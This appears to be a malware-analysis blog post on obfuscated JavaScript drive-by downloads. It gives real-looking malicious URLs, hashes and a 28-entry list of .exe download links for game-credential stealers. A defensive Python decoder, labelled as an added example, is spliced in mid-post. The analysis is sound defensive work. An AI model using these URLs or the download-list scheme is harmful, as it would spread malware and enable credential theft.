Exploitation of vulnerabilities through JS
Exploiting vulnerabilities through different file formats has become a commonplace and heavily used method for the creators and distributors of malware.
These methods, combined with other strategies, become a time bomb that is detonated by the simple act of visiting a page maliciously manipulated to host these attack strategies.
Numerous cases of weaknesses exploited through .js, .swf, .pdf and .mp3 files, and even files pretending to be .css, show that any type of file can be used as a channel of propagation, and even as a vector of infection.
In recent weeks, a wave of .js files is being used to redirect to the download of malicious code through obfuscated scripts hidden in the body of the JavaScript. One such script, hosted at the URL http://www710sese.cn/a1/realdadong.js (md5 hash d1094b907dfe99784b206d2ae9b1fe97), consists of a long unescape() call fed a string of %u-encoded shellcode.
The point is that, among the lines of this obfuscated script, code is executed that downloads a binary from a different URL. The file is called a1.css so that it appears to be a .css (Cascading Style Sheets) file, but the binary is malware.
Furthermore, in the middle of the whole infection process, which lasts only a few seconds, connections are established to txt.hsdee.com and www.wdswe.com. The former performs a Drive-by Update through the file oo.txt: when the server replies with a 200 "OK", the binaries listed in that file are downloaded, the first of them from http://www.wdswe.com/new/new1.exe (md5: 1c0b699171f985b1eab092bf83f2ad37).
The information read from the text file is:
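As an added example (not code from the original post), the following Python decodes the kind of %u-escaped string that the script above feeds to unescape(): each %uXXXX token becomes two bytes, low byte first, so the download URL embedded in the shellcode can be read back out and the file triaged offline. The sample string and the example.invalid URL are constructed, and the "suspicious" heuristic is this example's own, not a rule from the post; the first two tokens mirror the post's sample, which opens with %u17eb%u6090 (a short jmp followed by a nop).

```python
import re

# Constructed sample in the style the post describes: unescape() fed a run of
# %uXXXX tokens, split across string concatenation. The URL is a placeholder.
SAMPLE_JS = (
    'var mybr = unescape("%u17eb%u6090%u645e%u0000"+"%u7468%u7074%u2f3a'
    '%u652f%u6178%u706d%u656c%u692e%u766e%u6c61%u6469%u6e2f%u7765%u612f'
    '%u2e31%u7363%u0073");'
)

TOKEN_RE = re.compile(r"%u([0-9a-fA-F]{4})")
ASCII_RUN_RE = re.compile(rb"[\x20-\x7e]{6,}")
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")


def unescape_to_bytes(js_text: str) -> bytes:
    """Collapse every %uXXXX token in the text into raw bytes, low byte first.

    Whitespace and "+" concatenation between tokens are ignored, which is
    exactly what unescape() does when it builds the UTF-16 buffer in memory.
    """
    out = bytearray()
    for hex4 in TOKEN_RE.findall(js_text):
        value = int(hex4, 16)
        out.append(value & 0xFF)   # low byte is stored first
        out.append(value >> 8)     # then the high byte
    return bytes(out)


def extract_strings(blob: bytes) -> list:
    """Printable ASCII runs of 6+ characters, like the `strings` tool."""
    return [m.group().decode("ascii") for m in ASCII_RUN_RE.finditer(blob)]


def extract_urls(blob: bytes) -> list:
    """URLs embedded in the decoded buffer (NUL-terminated in the sample)."""
    return [m.group().decode("ascii") for m in URL_RE.finditer(blob)]


def triage(js_text: str) -> dict:
    """Decode the script and flag it when a long %u run carries a NOP (0x90)
    near its start or an embedded URL; this heuristic is the example's own."""
    blob = unescape_to_bytes(js_text)
    token_count = len(TOKEN_RE.findall(js_text))
    urls = extract_urls(blob)
    has_nop = b"\x90" in blob[:16]
    return {
        "token_count": token_count,
        "decoded": blob,
        "strings": extract_strings(blob),
        "urls": urls,
        "suspicious": token_count >= 16 and (has_nop or bool(urls)),
    }
```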
[file]
open = and
url1 = http://www.wdswe .com/new/new1. exe
url2 = http://www.wdswe .com/new/new2. exe
url3 = http://www.wdswe .com/new/new3. exe
url4 = http://www.wdswe .com/new/new4. exe
url5 = http://www.wdswe .com/new/new5. exe
url6 = http://www.wdswe .com/new/new6. exe
url7 = http://www.wdswe .com/new/new7. exe
url8 = http://www.wdswe .com/new/new8. exe
url9 = http://www.wdswe .com/new/new9. exe
url10 = http://www.wdswe .com/new/new10. exe
url11 = http://www.wdswe .com/new/new11. exe
url12 = http://www.wdswe .com/new/new12. exe
url13 = http://www.wdswe .com/new/new13. exe
url14 = http://www.wdswe .com/new/new14. exe
url15 = http://www.wdswe .com/new/new15. exe
url16 = http://www1.wdswe .com/new/new16. exe
url17 = http://www1.wdswe .com/new/new17. exe
url18 = http://www1.wdswe .com/new/new18. exe
url19 = http://www1.wdswe .com/new/new19. exe
url20 = http://www1.wdswe .com/new/new20. exe
url21 = http://www1.wdswe .com/new/new21. exe
url22 = http://www1.wdswe .com/new/new22. exe
url23 = http://www1.wdswe .com/new/new23. exe
url24 = http://www1.wdswe .com/new/new24. exe
url25 = http://www1.wdswe .com/new/new25. exe
url26 = http://www1.wdswe .com/new/new26. exe
url27 = http://www1.wdswe .com/new/new27. exe
url28 = http://www1.wdswe .com/new/new28. exe
count = 28
In this way the infection is carried out with several malicious codes, most of them designed to steal authentication credentials for online games such as WoW.
Other URLs, all of them .js files on similar domains, were used to spread malware in the same way.
Despite the advanced infection techniques used by malware creators, there is one fundamental measure that prevents falling victim to attacks of this kind: keeping the system fully updated, including its applications.
Jorge Mieres